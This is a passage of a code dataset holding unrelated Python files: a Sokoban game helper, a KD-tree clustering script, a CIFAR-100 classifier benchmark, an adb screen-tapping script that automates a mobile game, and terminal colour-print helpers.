return_data['result'] = \"ng\"\r\n print('人当前的位置 : {}'.format(_r))\r\n print('目标当前位置 : {}'.format(_o))\r\n print('箱子当前位置 : {}'.format(_p))\r\n return return_data\r\n\r\n @staticmethod\r\n def down(set_data):\r\n arr, _r, _p, _o = Common().check_dict(set_data)\r\n if arr == \"ng\":\r\n print(\"检查输入存在问题,需要重新配置游戏。\")\r\n set_data[\"result\"] = '检查输入存在问题,需要重新配置游戏。'\r\n return set_data\r\n if _r[0] == len(arr) - 1:\r\n print(\"无法向下了,已经到底了。\")\r\n set_data[\"result\"] = '无法向下了,已经到底了。'\r\n return set_data\r\n # 判断墙的存在\r\n else:\r\n if [_r[0] + 1, _r[1]] in _p:\r\n index = _p.index([_r[0]+1, _r[1]])\r\n # 判断箱子上面有没有箱子\r\n if [_p[index][0]+1, _p[index][1]] in _p:\r\n print(\"没有那么大的力气,移不动两个箱子。\")\r\n set_data[\"result\"] = '没有那么大的力气,移不动两个箱子。'\r\n return set_data\r\n if _r[0] + 1 == _p[index][0] and _p[index][0] == len(arr) - 1 and _r[1] == _p[index][1]:\r\n print(\"不能推动箱子了,箱子已经到底了。\")\r\n set_data[\"result\"] = '不能推动箱子了,箱子已经到底了。'\r\n return set_data\r\n elif _r[0] + 1 == _p[index][0] and _p[index][0] != len(arr) - 1 and _r[1] == _p[index][1]:\r\n \"\"\"箱子在人的下面\"\"\"\r\n arr[_p[index][0] + 1][_p[index][1]] = 'P'\r\n arr[_r[0] + 1][_r[1]] = 'R'\r\n arr[_r[0]][_r[1]] = '*'\r\n if [_p[index][0] + 1, _p[index][1]] in _o:\r\n print(\"恭喜你,箱子到达目标。\")\r\n arr[_p[index][0] + 1][_p[index][1]] = 'OP'\r\n _r = [_r[0] + 1, _r[1]]\r\n _p[index] = [_p[index][0] + 1, _p[index][1]]\r\n else:\r\n \"\"\"人的下面没有东西,可以随意搬动\"\"\"\r\n arr[_r[0] + 1][_r[1]] = 'R'\r\n arr[_r[0]][_r[1]] = '*'\r\n _r = [_r[0] + 1, _r[1]]\r\n for oi in range(len(_o)):\r\n if arr[_o[oi][0]][_o[oi][1]] == \"*\":\r\n arr[_o[oi][0]][_o[oi][1]] = \"O\"\r\n op_flag = 0\r\n for op in range(len(_o)):\r\n if [_p[op][0], _p[op][1]] not in _o:\r\n op_flag = 1\r\n break\r\n return_data = {\"arr\": arr, \"o\": _o, \"p\": _p, \"r\": _r}\r\n if op_flag == 0:\r\n return_data['result'] = 'ok'\r\n else:\r\n return_data['result'] = \"ng\"\r\n print('人当前的位置 : {}'.format(_r))\r\n print('目标当前位置 : {}'.format(_o))\r\n print('箱子当前位置 : {}'.format(_p))\r\n return return_data\r\n\r\n @staticmethod\r\n def left(set_data):\r\n arr, _r, _p, _o = Common().check_dict(set_data)\r\n if arr == \"ng\":\r\n print(\"检查输入存在问题,需要重新配置游戏。\")\r\n set_data[\"result\"] = '检查输入存在问题,需要重新配置游戏。'\r\n return set_data\r\n if _r[1] == 0:\r\n print(\"无法向左了,已经到头了。\")\r\n set_data[\"result\"] = '无法向左了,已经到头了。'\r\n return set_data\r\n else:\r\n if [_r[0], _r[1] - 1] in _p:\r\n index = _p.index([_r[0], _r[1]-1])\r\n # 判断箱子上面有没有箱子\r\n if [_p[index][0], _p[index][1] - 1] in _p:\r\n print(\"没有那么大的力气,移不动两个箱子。\")\r\n set_data[\"result\"] = '没有那么大的力气,移不动两个箱子。'\r\n return set_data\r\n if _r[1] - 1 == _p[index][1] and _p[index][1] == 0 and _r[0] == _p[index][0]:\r\n print(\"不能推动箱子了,箱子已经到头了。\")\r\n set_data[\"result\"] = '不能推动箱子了,箱子已经到头了。'\r\n return set_data\r\n elif _r[1] - 1 == _p[index][1] and _p[index][1] != 0 and _r[0] == _p[index][0]:\r\n \"\"\"箱子在人的左面\"\"\"\r\n arr[_p[index][0]][_p[index][1] - 1] = 'P'\r\n arr[_r[0]][_r[1] - 1] = 'R'\r\n arr[_r[0]][_r[1]] = '*'\r\n if [_p[index][0], _p[index][1] - 1] in _o:\r\n print(\"恭喜你,箱子到达目标。\")\r\n arr[_p[index][0]][_p[index][1] - 1] = 'OP'\r\n _r = [_r[0], _r[1] - 1]\r\n _p[index] = [_p[index][0], _p[index][1] - 1]\r\n else:\r\n \"\"\"人的下面没有东西,可以随意搬动\"\"\"\r\n arr[_r[0]][_r[1] - 1] = 'R'\r\n arr[_r[0]][_r[1]] = '*'\r\n _r = [_r[0], _r[1] - 1]\r\n for oi in range(len(_o)):\r\n if arr[_o[oi][0]][_o[oi][1]] == \"*\":\r\n arr[_o[oi][0]][_o[oi][1]] = \"O\"\r\n op_flag = 0\r\n for op in range(len(_o)):\r\n if [_p[op][0], _p[op][1]] not in _o:\r\n op_flag = 1\r\n break\r\n 
return_data = {\"arr\": arr, \"o\": _o, \"p\": _p, \"r\": _r}\r\n if op_flag == 0:\r\n return_data['result'] = 'ok'\r\n else:\r\n return_data['result'] = \"ng\"\r\n print('人当前的位置 : {}'.format(_r))\r\n print('目标当前位置 : {}'.format(_o))\r\n print('箱子当前位置 : {}'.format(_p))\r\n return return_data\r\n\r\n @staticmethod\r\n def right(set_data):\r\n arr, _r, _p, _o = Common().check_dict(set_data)\r\n if arr == \"ng\":\r\n print(\"检查输入存在问题,需要重新配置游戏。\")\r\n set_data[\"result\"] = '检查输入存在问题,需要重新配置游戏。'\r\n return set_data\r\n if _r[1] == len(arr[0]) - 1:\r\n print(\"无法向右了,已经到结尾了。\")\r\n set_data[\"result\"] = '无法向右了,已经到结尾了。'\r\n return set_data\r\n # 考虑是否存在墙的问题\r\n else:\r\n if [_r[0], _r[1] + 1] in _p:\r\n index = _p.index([_r[0], _r[1]+1])\r\n # 判断箱子上面有没有箱子\r\n if [_p[index][0], _p[index][1] + 1] in _p:\r\n print(\"没有那么大的力气,移不动两个箱子。\")\r\n set_data[\"result\"] = '没有那么大的力气,移不动两个箱子。'\r\n return set_data\r\n if _r[1] + 1 == _p[index][1] and _p[index][1] == len(arr[0]) - 1 and _r[0] == _p[index][0]:\r\n print(\"不能推动箱子了,箱子已经到结尾了。\")\r\n set_data[\"result\"] = '不能推动箱子了,箱子已经到结尾了。'\r\n return set_data\r\n elif _r[1] + 1 == _p[index][1] and _p[index][1] != len(arr[0]) - 1 and _r[0] == _p[index][0]:\r\n \"\"\"箱子在人的右面\"\"\"\r\n arr[_p[index][0]][_p[index][1] + 1] = 'P'\r\n arr[_r[0]][_r[1] + 1] = 'R'\r\n arr[_r[0]][_r[1]] = '*'\r\n if [_p[index][0], _p[index][1] + 1] in _o:\r\n print(\"恭喜你,箱子到达目标。\")\r\n arr[_p[index][0]][_p[index][1] + 1] = 'OP'\r\n _r = [_r[0], _r[1] + 1]\r\n _p[index] = [_p[index][0], _p[index][1] + 1]\r\n else:\r\n \"\"\"人的右面没有东西,可以随意走动\"\"\"\r\n arr[_r[0]][_r[1] + 1] = 'R'\r\n arr[_r[0]][_r[1]] = '*'\r\n _r = [_r[0], _r[1] + 1]\r\n for oi in range(len(_o)):\r\n if arr[_o[oi][0]][_o[oi][1]] == \"*\":\r\n arr[_o[oi][0]][_o[oi][1]] = \"O\"\r\n op_flag = 0\r\n for op in range(len(_o)):\r\n if [_p[op][0], _p[op][1]] not in _o:\r\n op_flag = 1\r\n break\r\n return_data = {\"arr\": arr, \"o\": _o, \"p\": _p, \"r\": _r}\r\n if op_flag == 0:\r\n return_data['result'] = 'ok'\r\n else:\r\n return_data['result'] = \"ng\"\r\n print('人当前的位置 : {}'.format(_r))\r\n print('目标当前位置 : {}'.format(_o))\r\n print('箱子当前位置 : {}'.format(_p))\r\n return return_data\r\n\r\n @staticmethod\r\n def get_config_value(opt='', config_file=r'../Config/game1.config'):\r\n config = NewConfigParser()\r\n try:\r\n config.read(config_file, encoding='utf-8')\r\n if not config.has_section(\"game\"):\r\n print(\"There is no section game, Please check this config.\" + config_file)\r\n return \"no\"\r\n if not config.has_option(\"game\", opt):\r\n print(\"There is no option, \" + opt + \". 
Please check this config.\" + config_file)\r\n return \"ng\"\r\n else:\r\n value = config.get(\"game\", opt)\r\n return value\r\n\r\n except configparser.DuplicateOptionError as doe:\r\n print(\"{} 有问题,需要查看 {}\".format(doe, config_file))\r\n pass\r\n\r\n # 每次只解析一个游戏就好了。不需要全部都解析\r\n @staticmethod\r\n def parser_config(game_config):\r\n config = {}\r\n background = []\r\n ren = []\r\n goal = []\r\n push = []\r\n wall = []\r\n f = game_config\r\n flag = Common().get_config_value(opt=\"bx\", config_file=f)\r\n if flag == \"no\" or flag == \"ng\":\r\n print(\"{} 没有game标签或者没有值。\".format(\"bx\"))\r\n return \"no\"\r\n else:\r\n background.append(int(flag))\r\n flag = Common().get_config_value(opt=\"by\", config_file=f)\r\n if flag == \"ng\":\r\n print(\"{} 没有值。\".format(\"by\"))\r\n return \"no\"\r\n else:\r\n background.append(int(flag))\r\n array = [['*' for i in range(int(background[0]))] for j in range(int(background[1]))]\r\n flag = Common().get_config_value(opt=\"rx\", config_file=f)\r\n if flag == \"ng\":\r\n print(\"{} 没有值。\".format(\"rx\"))\r\n return \"no\"\r\n else:\r\n ren.append(int(flag))\r\n flag = Common().get_config_value(opt=\"ry\", config_file=f)\r\n if flag == \"ng\":\r\n print(\"{} 没有值。\".format(\"ry\"))\r\n return \"no\"\r\n else:\r\n ren.append(int(flag))\r\n config['r'] = ren\r\n array[int(ren[0])][int(ren[1])] = \"R\"\r\n ox = []\r\n for m in range(1, background[0]):\r\n value = Common().get_config_value(opt=\"ox\" + str(m), config_file=f)\r\n if value != \"ng\":\r\n ox.append(int(value))\r\n else:\r\n break\r\n oy = []\r\n for n in range(1, background[1]):\r\n value = Common().get_config_value(opt=\"oy\" + str(n), config_file=f)\r\n if value != \"ng\":\r\n oy.append(int(value))\r\n else:\r\n break\r\n for o in range(len(ox)):\r\n goal.append([int(ox[o]), int(oy[o])])\r\n array[int(ox[o])][int(oy[o])] = \"O\"\r\n config[\"o\"] = goal\r\n\r\n px = []\r\n for m in range(1, background[0]):\r\n value = Common().get_config_value(opt=\"px\" + str(m), config_file=f)\r\n if value != \"ng\":\r\n px.append(int(value))\r\n else:\r\n break\r\n py = []\r\n for n in range(1, background[1]):\r\n value = Common().get_config_value(opt=\"py\" + str(n), config_file=f)\r\n if value != \"ng\":\r\n py.append(int(value))\r\n else:\r\n break\r\n for p in range(len(px)):\r\n push.append([int(px[p]), int(py[p])])\r\n array[int(px[p])][int(py[p])] = \"P\"\r\n config[\"p\"] = push\r\n config[\"arr\"] = array\r\n return config\r\n\r\n @staticmethod\r\n def get_config(file_path):\r\n get_files = []\r\n for (root, dirs, files) in os.walk(file_path):\r\n for file in files:\r\n if \".config\" in file:\r\n get_files.append(os.path.join(root, file))\r\n\r\n return get_files\r\n\r\n\r\nif __name__ == '__main__':\r\n pass\r\n c = Common()\r\n for i in range(len(c.array)):\r\n print(c.array[i])\r\n o = [[2, 3], [4, 6]]\r\n p = [[3, 3], [5, 6]]\r\n r = [4, 3]\r\n for i in range(len(o)):\r\n c.array[o[i][0]][o[i][1]] = \"O\"\r\n for i in range(len(p)):\r\n c.array[p[i][0]][p[i][1]] = \"P\"\r\n c.array[r[0]][r[1]] = \"R\"\r\n\r\n set_data = {\"arr\": c.array, 'o': o, 'p': p, 'r': r, 'q': ''}\r\n ll = c.up(set_data)\r\n\r\n if ll == 'ng':\r\n print(\"重新输入。\")\r\n exit()\r\n for i in range(len(ll['arr'])):\r\n print(ll['arr'][i])\r\n\r\n # lll = c.right(ll)\r\n # for i in range(len(lll['arr'])):\r\n # 
print(lll['arr'][i])\r\n","sub_path":"GUITest/PushTheBoxGUIKeyPress/Common/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":17217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"209152437","text":"import numpy as np\r\nimport math\r\nfrom random import random, randrange\r\nfrom PIL import Image\r\nimport random\r\nfrom scipy import spatial\r\nimport matplotlib.pyplot as plt\r\nimport csv \r\nimport sys\r\n\r\nnodes=[]\r\npoints = []\r\nwith open('dataset.csv') as csv_file:\r\n csv_reader = csv.reader(csv_file, delimiter=',')\r\n for row in csv_reader:\r\n points.append((int(row[0]),int(row[1])))\r\n\r\ndef dist(a, b):\r\n return math.dist(a,b)\r\n \r\nclass Node:\r\n def __init__(self,tupla):\r\n self.point = tupla\r\n self.cluster = -1\r\n self.dimensions = len(self.point)\r\n\r\n def getItems(self,r):\r\n global tree\r\n temp = []\r\n data = tree.query_ball_point(self.point,r)\r\n # print(data)\r\n for item in data:\r\n temp.append(nodes[item])\r\n return temp\r\n\r\nclass Cluster:\r\n def __init__(self,x,r=1):\r\n self.number = x\r\n self.items = []\r\n self.r = r\r\n self.itemCount = 0\r\n\r\n def build_cluster(self,node):\r\n global tree\r\n self.items.append(node)\r\n self.itemCount += 1\r\n node.cluster = self.number\r\n neighbours = node.getItems(self.r)\r\n for neigh in neighbours:\r\n if neigh.cluster == -1:\r\n # print(\"HERE - \", neigh.point)\r\n self.build_cluster(neigh)\r\n\r\n def isValid(self):\r\n return self.itemCount >= 2\r\n\r\n def define(self, node):\r\n self.build_cluster(node)\r\n if(not self.isValid()):\r\n for i in range(len(self.items)-1, -1, -1):\r\n self.items[i].cluster = -2\r\n self.items.pop()\r\n return False\r\n return True\r\n\r\n\r\nfor point in points: \r\n nodes.append(Node(point))\r\n\r\n\r\ntree =spatial.KDTree(points)\r\n\r\nclusters = []\r\nsize = len(nodes)\r\n\r\nr = 1 \r\n\r\ncluster_num = 0\r\nfor node in nodes:\r\n if node.cluster == -1:\r\n new_cluster = Cluster(cluster_num)\r\n if(new_cluster.define(node)):\r\n clusters.append(new_cluster)\r\n cluster_num += 1\r\nprint(\"asdas: \")\r\n\r\nfor x in clusters:\r\n print(x.items)\r\n print(\"------------\")\r\nprint(\"cluster_num: \" + str(cluster_num))","sub_path":"MeanShift2.py","file_name":"MeanShift2.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"424989035","text":"\"\"\"\nCoauthors: Haoyin Xu\n Yu-Chung Peng\n\"\"\"\nfrom toolbox import *\n\nimport argparse\nimport random\nfrom sklearn.ensemble import RandomForestClassifier\n\nimport torchvision.models as models\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\n\n\ndef run_naive_rf():\n naive_rf_kappa = []\n naive_rf_ece = []\n naive_rf_train_time = []\n naive_rf_test_time = []\n for classes in classes_space:\n\n # cohen_kappa vs num training samples (naive_rf)\n for samples in samples_space:\n RF = RandomForestClassifier(n_estimators=100, n_jobs=-1)\n cohen_kappa, ece, train_time, test_time = run_rf_image_set(\n RF,\n cifar_train_images,\n cifar_train_labels,\n cifar_test_images,\n cifar_test_labels,\n samples,\n classes,\n )\n naive_rf_kappa.append(cohen_kappa)\n naive_rf_ece.append(ece)\n naive_rf_train_time.append(train_time)\n naive_rf_test_time.append(test_time)\n\n print(\"naive_rf finished\")\n write_result(prefix + \"naive_rf_kappa.txt\", naive_rf_kappa)\n write_result(prefix + \"naive_rf_ece.txt\", naive_rf_ece)\n 
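# --- Editor's note (hedged sketch) -------------------------------------
# Despite the file name MeanShift2.py, the record above implements a
# density/flood-fill clustering over KD-tree neighbourhoods (closer to
# DBSCAN than to mean shift), and build_cluster recurses once per
# neighbour, so a dense dataset can exceed Python's default recursion
# limit (~1000 frames). An iterative variant with an explicit stack;
# `grow_cluster` is a hypothetical name, not from the record.
from scipy import spatial

def grow_cluster(points, tree, labels, seed, cluster_id, r=1.0):
    """Label every point reachable from `seed` through r-neighbourhoods."""
    stack = [seed]
    labels[seed] = cluster_id
    count = 0
    while stack:
        idx = stack.pop()
        count += 1
        for nb in tree.query_ball_point(points[idx], r):
            if labels[nb] == -1:             # unvisited neighbour
                labels[nb] = cluster_id
                stack.append(nb)
    return count

points = [(0, 0), (0, 1), (5, 5)]
tree = spatial.KDTree(points)
labels = [-1] * len(points)
grow_cluster(points, tree, labels, seed=0, cluster_id=0)
print(labels)                                # [0, 0, -1]
# -----------------------------------------------------------------------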
write_result(prefix + \"naive_rf_train_time.txt\", naive_rf_train_time)\n write_result(prefix + \"naive_rf_test_time.txt\", naive_rf_test_time)\n\n\ndef run_cnn32():\n cnn32_kappa = []\n cnn32_ece = []\n cnn32_train_time = []\n cnn32_test_time = []\n for classes in classes_space:\n\n # cohen_kappa vs num training samples (cnn32)\n for samples in samples_space:\n # train data\n cifar_trainset = datasets.CIFAR100(\n root=\"./\", train=True, download=True, transform=data_transforms\n )\n cifar_train_labels = np.array(cifar_trainset.targets)\n\n # test data\n cifar_testset = datasets.CIFAR100(\n root=\"./\", train=False, download=True, transform=data_transforms\n )\n cifar_test_labels = np.array(cifar_testset.targets)\n\n cnn32 = SimpleCNN32Filter(len(classes))\n train_loader, valid_loader, test_loader = create_loaders_es(\n cifar_train_labels,\n cifar_test_labels,\n classes,\n cifar_trainset,\n cifar_testset,\n samples,\n )\n cohen_kappa, ece, train_time, test_time = run_dn_image_es(\n cnn32,\n train_loader,\n valid_loader,\n test_loader,\n )\n cnn32_kappa.append(cohen_kappa)\n cnn32_ece.append(ece)\n cnn32_train_time.append(train_time)\n cnn32_test_time.append(test_time)\n\n print(\"cnn32 finished\")\n write_result(prefix + \"cnn32_kappa.txt\", cnn32_kappa)\n write_result(prefix + \"cnn32_ece.txt\", cnn32_ece)\n write_result(prefix + \"cnn32_train_time.txt\", cnn32_train_time)\n write_result(prefix + \"cnn32_test_time.txt\", cnn32_test_time)\n\n\ndef run_cnn32_2l():\n cnn32_2l_kappa = []\n cnn32_2l_ece = []\n cnn32_2l_train_time = []\n cnn32_2l_test_time = []\n for classes in classes_space:\n\n # cohen_kappa vs num training samples (cnn32_2l)\n for samples in samples_space:\n # train data\n cifar_trainset = datasets.CIFAR100(\n root=\"./\", train=True, download=True, transform=data_transforms\n )\n cifar_train_labels = np.array(cifar_trainset.targets)\n\n # test data\n cifar_testset = datasets.CIFAR100(\n root=\"./\", train=False, download=True, transform=data_transforms\n )\n cifar_test_labels = np.array(cifar_testset.targets)\n\n cnn32_2l = SimpleCNN32Filter2Layers(len(classes))\n train_loader, valid_loader, test_loader = create_loaders_es(\n cifar_train_labels,\n cifar_test_labels,\n classes,\n cifar_trainset,\n cifar_testset,\n samples,\n )\n cohen_kappa, ece, train_time, test_time = run_dn_image_es(\n cnn32_2l,\n train_loader,\n valid_loader,\n test_loader,\n )\n cnn32_2l_kappa.append(cohen_kappa)\n cnn32_2l_ece.append(ece)\n cnn32_2l_train_time.append(train_time)\n cnn32_2l_test_time.append(test_time)\n\n print(\"cnn32_2l finished\")\n write_result(prefix + \"cnn32_2l_kappa.txt\", cnn32_2l_kappa)\n write_result(prefix + \"cnn32_2l_ece.txt\", cnn32_2l_ece)\n write_result(prefix + \"cnn32_2l_train_time.txt\", cnn32_2l_train_time)\n write_result(prefix + \"cnn32_2l_test_time.txt\", cnn32_2l_test_time)\n\n\ndef run_cnn32_5l():\n cnn32_5l_kappa = []\n cnn32_5l_ece = []\n cnn32_5l_train_time = []\n cnn32_5l_test_time = []\n for classes in classes_space:\n\n # cohen_kappa vs num training samples (cnn32_5l)\n for samples in samples_space:\n # train data\n cifar_trainset = datasets.CIFAR100(\n root=\"./\", train=True, download=True, transform=data_transforms\n )\n cifar_train_labels = np.array(cifar_trainset.targets)\n\n # test data\n cifar_testset = datasets.CIFAR100(\n root=\"./\", train=False, download=True, transform=data_transforms\n )\n cifar_test_labels = np.array(cifar_testset.targets)\n\n cnn32_5l = SimpleCNN32Filter5Layers(len(classes))\n train_loader, valid_loader, test_loader = 
create_loaders_es(\n cifar_train_labels,\n cifar_test_labels,\n classes,\n cifar_trainset,\n cifar_testset,\n samples,\n )\n cohen_kappa, ece, train_time, test_time = run_dn_image_es(\n cnn32_5l,\n train_loader,\n valid_loader,\n test_loader,\n )\n cnn32_5l_kappa.append(cohen_kappa)\n cnn32_5l_ece.append(ece)\n cnn32_5l_train_time.append(train_time)\n cnn32_5l_test_time.append(test_time)\n\n print(\"cnn32_5l finished\")\n write_result(prefix + \"cnn32_5l_kappa.txt\", cnn32_5l_kappa)\n write_result(prefix + \"cnn32_5l_ece.txt\", cnn32_5l_ece)\n write_result(prefix + \"cnn32_5l_train_time.txt\", cnn32_5l_train_time)\n write_result(prefix + \"cnn32_5l_test_time.txt\", cnn32_5l_test_time)\n\n\ndef run_resnet18():\n resnet18_kappa = []\n resnet18_ece = []\n resnet18_train_time = []\n resnet18_test_time = []\n for classes in classes_space:\n\n # cohen_kappa vs num training samples (resnet18)\n for samples in samples_space:\n # train data\n cifar_trainset = datasets.CIFAR100(\n root=\"./\", train=True, download=True, transform=data_transforms\n )\n cifar_train_labels = np.array(cifar_trainset.targets)\n\n # test data\n cifar_testset = datasets.CIFAR100(\n root=\"./\", train=False, download=True, transform=data_transforms\n )\n cifar_test_labels = np.array(cifar_testset.targets)\n\n res = models.resnet18(pretrained=True)\n num_ftrs = res.fc.in_features\n res.fc = nn.Linear(num_ftrs, len(classes))\n train_loader, valid_loader, test_loader = create_loaders_es(\n cifar_train_labels,\n cifar_test_labels,\n classes,\n cifar_trainset,\n cifar_testset,\n samples,\n )\n cohen_kappa, ece, train_time, test_time = run_dn_image_es(\n res,\n train_loader,\n valid_loader,\n test_loader,\n )\n resnet18_kappa.append(cohen_kappa)\n resnet18_ece.append(ece)\n resnet18_train_time.append(train_time)\n resnet18_test_time.append(test_time)\n\n print(\"resnet18 finished\")\n write_result(prefix + \"resnet18_kappa.txt\", resnet18_kappa)\n write_result(prefix + \"resnet18_ece.txt\", resnet18_ece)\n write_result(prefix + \"resnet18_train_time.txt\", resnet18_train_time)\n write_result(prefix + \"resnet18_test_time.txt\", resnet18_test_time)\n\n\nif __name__ == \"__main__\":\n torch.multiprocessing.freeze_support()\n\n # Example usage: python cifar_100.py -m 90\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-m\", help=\"class number\")\n args = parser.parse_args()\n n_classes = int(args.m)\n prefix = args.m + \"_class/\"\n samples_space = np.geomspace(100, 10000, num=8, dtype=int)\n\n nums = list(range(100))\n random.shuffle(nums)\n classes_space = list(combinations_45(nums, n_classes))\n\n # normalize\n scale = np.mean(np.arange(0, 256))\n normalize = lambda x: (x - scale) / scale\n\n # train data\n cifar_trainset = datasets.CIFAR100(\n root=\"./\", train=True, download=True, transform=None\n )\n cifar_train_images = normalize(cifar_trainset.data)\n cifar_train_labels = np.array(cifar_trainset.targets)\n\n # test data\n cifar_testset = datasets.CIFAR100(\n root=\"./\", train=False, download=True, transform=None\n )\n cifar_test_images = normalize(cifar_testset.data)\n cifar_test_labels = np.array(cifar_testset.targets)\n\n cifar_train_images = cifar_train_images.reshape(-1, 32 * 32 * 3)\n cifar_test_images = cifar_test_images.reshape(-1, 32 * 32 * 3)\n\n run_naive_rf()\n\n data_transforms = transforms.Compose(\n [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]\n )\n\n run_cnn32()\n run_cnn32_2l()\n run_cnn32_5l()\n\n data_transforms = transforms.Compose(\n [\n 
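# --- Editor's note (hedged sketch) -------------------------------------
# run_cnn32, run_cnn32_2l, run_cnn32_5l and run_resnet18 in this record
# repeat the same download/loader/evaluate/write loop and differ only in
# how the model is built. A sketch of one driver taking a model factory;
# it assumes the signatures of create_loaders_es, run_dn_image_es and
# write_result exactly as they are used above (they come from the
# script's own `toolbox` import), and `run_dn_benchmark` is hypothetical.
def run_dn_benchmark(name, make_model, classes_space, samples_space, prefix):
    kappa, ece, train_t, test_t = [], [], [], []
    for classes in classes_space:
        for samples in samples_space:
            trainset = datasets.CIFAR100(root="./", train=True,
                                         download=True, transform=data_transforms)
            testset = datasets.CIFAR100(root="./", train=False,
                                        download=True, transform=data_transforms)
            loaders = create_loaders_es(np.array(trainset.targets),
                                        np.array(testset.targets),
                                        classes, trainset, testset, samples)
            model = make_model(len(classes))         # the only varying piece
            ck, e, tr, te = run_dn_image_es(model, *loaders)
            kappa.append(ck); ece.append(e); train_t.append(tr); test_t.append(te)
    print(name + " finished")
    for suffix, vals in (("kappa", kappa), ("ece", ece),
                         ("train_time", train_t), ("test_time", test_t)):
        write_result(prefix + name + "_" + suffix + ".txt", vals)

# e.g. run_dn_benchmark("cnn32", SimpleCNN32Filter,
#                       classes_space, samples_space, prefix)
# -----------------------------------------------------------------------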
transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n ]\n )\n\n run_resnet18()\n","sub_path":"benchmarks/vision/cifar_100.py","file_name":"cifar_100.py","file_ext":"py","file_size_in_byte":9960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"170431689","text":"import os\nfrom time import sleep\nimport sys\n\n\ndef chapter1():\n click_screen(700,350)\n print('点击进入第一章陨落的废都')\n sleep(1)\n\n\ndef next_chapter():\n click_screen(692,986)\n print('点击下一章按钮')\n sleep(1)\n\n\ndef elite():\n click_screen(1700,490)\n print('点击大师')\n sleep(1)\n\n\ndef master():\n click_screen(1700,670)\n print('点击大师')\n sleep(1)\n\n\ndef subchapter3():\n click_screen(1150,463)\n print('进入第3小节')\n sleep(1)\n\n\ndef subchapter4():\n click_screen(1200,560)\n print('点击进入第4小节')\n sleep(1)\n\n\ndef begin():\n click_screen(1700,800)\n print('进入万象天工')\n sleep(1)\n click_screen(220,256)\n print('进入冒险玩法')\n sleep(1)\n click_screen(1160,810)\n print('进入挑战')\n sleep(1)\n\n\ndef click_screen(x, y):\n # 通过像素点位置点击屏幕,x,y是屏幕坐标\n # 调用adb点击手机屏幕事件\n os.system('adb shell input tap {} {}'.format(x, y))\n\n\nt = 30\ncircle = 80\n\n\ndef entry():\n chapter1()\n master()\n subchapter4()\n click_screen(1700,910)\n print('点击下一步')\n sleep(1)\n click_screen(1650,870)\n print('闯关')\n print(\"开始战斗...\")\n sleep(1)\n global t\n tt = t\n while tt >= 0:\n sleep(1)\n click_screen(1060, 540)\n print(tt, flush=True)\n tt = tt - 1\n global circle\n n = circle\n while n >= 0:\n print(n, flush=True)\n click_screen(1060, 540)\n sleep(1)\n n = n - 1\n '''\n click_screen(1175,975)\n print('\\n点击屏幕继续')\n sleep(1)\n '''\n\n\ndef repeat():\n click_screen(2000,1000)\n print('点击再次挑战')\n sleep(1)\n click_screen(1650, 870)\n print('点击闯关')\n sleep(1)\n global t\n tt = t\n while tt >= 0:\n click_screen(1060, 540)\n sleep(1)\n print(tt, flush=True)\n tt = tt - 1\n global circle\n n = circle\n while n >= 0:\n print(n, flush=True)\n click_screen(1060, 540)\n sleep(1)\n n = n - 1\n\n\ndef main():\n begin()\n entry()\n for i in range(2, 200):\n print('*' * 50)\n print(\"第{}轮开始\".format(i))\n repeat()\n print('第{}轮结束'.format(i))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"master_1_4.py","file_name":"master_1_4.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"465761587","text":"from sys import stdout\nfrom os import linesep\nfrom time import sleep\n\ndef doHeart(message, iterations = 1, delayTime = 0.1):\n for i in range(0, iterations):\n for i in range(90, 97):\n stdout.write(\"\\r\\033[0m[\\033[\" + str(i) + \";1m<3\\033[0m] \\033[0m\" + message)\n stdout.flush()\n sleep(delayTime)\n stdout.write(linesep)\n return\n\ndef i(message, mode = 'i', verbose = False):\n if mode == 'v' and verbose: #VERBOSE\n return input(\"\\033[90;1m\" + message + \"\\033[0m\")\n elif mode == 'e': #ERROR\n return input(\"\\033[91;1m\" + message + \"\\033[0m\")\n elif mode == 's': #SUCCESS\n return input(\"\\033[92;1m\" + message + \"\\033[0m\")\n elif mode == 'w': #WARNING\n return input(\"\\033[93;1m\" + message + \"\\033[0m\")\n elif mode == 'i': #INFORMATION\n return input(\"\\033[94;1m\" + message + \"\\033[0m\")\n else:\n return\n\ndef p(message, mode = 'i', verbose = False, prefix = \"\", suffix = linesep):\n if mode == 'v' and verbose: #VERBOSE\n stdout.write(prefix + \"\\033[0m[\\033[90;1m#\\033[0m] \\033[90;2m\" + message + \"\\033[0m\" + suffix)\n elif mode == 'e': #ERROR\n 
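# --- Editor's note (hedged sketch) -------------------------------------
# master_1_4.py above taps the screen with os.system('adb shell input
# tap ...'), which spawns a shell per tap and silently ignores failures.
# A sketch of the same tap via subprocess.run, which keeps the arguments
# as a list and lets the caller see adb's exit status.
import subprocess

def click_screen(x, y):
    """Tap the connected device at pixel (x, y) through adb."""
    result = subprocess.run(
        ["adb", "shell", "input", "tap", str(x), str(y)],
        capture_output=True, text=True)
    if result.returncode != 0:
        print("adb tap failed:", result.stderr.strip())
# -----------------------------------------------------------------------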
